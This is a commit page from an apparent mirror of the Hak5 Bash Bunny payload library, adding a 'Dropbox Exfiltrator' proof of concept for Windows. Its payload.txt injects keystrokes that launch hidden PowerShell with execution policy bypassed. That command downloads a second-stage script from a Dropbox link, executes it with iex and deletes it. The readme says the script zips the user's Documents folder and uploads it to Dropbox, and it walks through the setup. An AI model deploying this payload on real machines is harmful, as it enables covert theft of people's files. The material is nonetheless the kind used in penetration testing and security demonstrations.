hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added dropbox exfiltrator PoC payload

pull/374/head
Darren Kitchen 2019-01-30 12:17:55 -08:00 committed by GitHub
parent 55c7d4f706
commit d341068548
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 49 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
payloads/library/exfiltration/dropbox-exfiltrator/exfil.ps1 Normal file
View File

Binary file not shown.

15
payloads/library/exfiltration/dropbox-exfiltrator/payload.txt Normal file
View File

@ -0,0 +1,15 @@
# Dropbox Exfiltrator
# Author: Hak5Darren
# Props: jimcola99 Buchanan
# Demo: Hak5 episode 2505
# Target: Windows Vista+
# Category: Exfiltration
LED SETUP
ATTACKMODE HID
LED ATTACK
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell -w h -NoP -NonI -Exec Bypass \"\$e=\\\"\$env:TMP/e.ps1\\\"\;iwr https://www.dropbox.com/s/61jx6u40orxmvzz/exfil.ps1?dl=1 -O \$e\;iex \$e\;rm \$e\"
QUACK ENTER
LED FINISH

34
payloads/library/exfiltration/dropbox-exfiltrator/readme.md Normal file
View File

@ -0,0 +1,34 @@
# Dropbox Exfiltrator Proof-of-Concept
* Author: Hak5Darren
* Props: jimcola99 Buchanan
* Demo: Hak5 episode 2505
* Target: Windows Vista+
* Category: Exfiltration
## Proof of Concept
This payload is not robust and is meant for demonstration purposes only. Known issues include the 150 MB file chunking limitation with Dropbox, as well as the IWR/IEX method and compression overhead. Please feel free to clean up.
## Description
Staged powershell payload which downloads and executes exfil.ps1 from dropbox which compresses the users documents folder and uploads it to dropbox.
## Requirements
* Step 1. Create a Dropbox app using their API and generate an access token from https://www.dropbox.com/developers/apps/create
* Step 2. Customize the powershell second stage exfil.ps1 file to exfiltrate the loot to Dropbox using the token generated above
* Step 3. Get a direct dropbox link for the powershell file (right-click exfil.ps1, get dropbox link, replace dl=0 with dl=1)
* Step 4. Customize the exfiltration payload.txt to use the dropbox link from above
* Step 5. ???
* Step 6. h4x
## STATUS
| LED | Status |
| ----------------- | -------------------------------------- |
| SETUP | Setting attack mode |
| ATACK | Injecting keystrokes |
| FINISH | All done |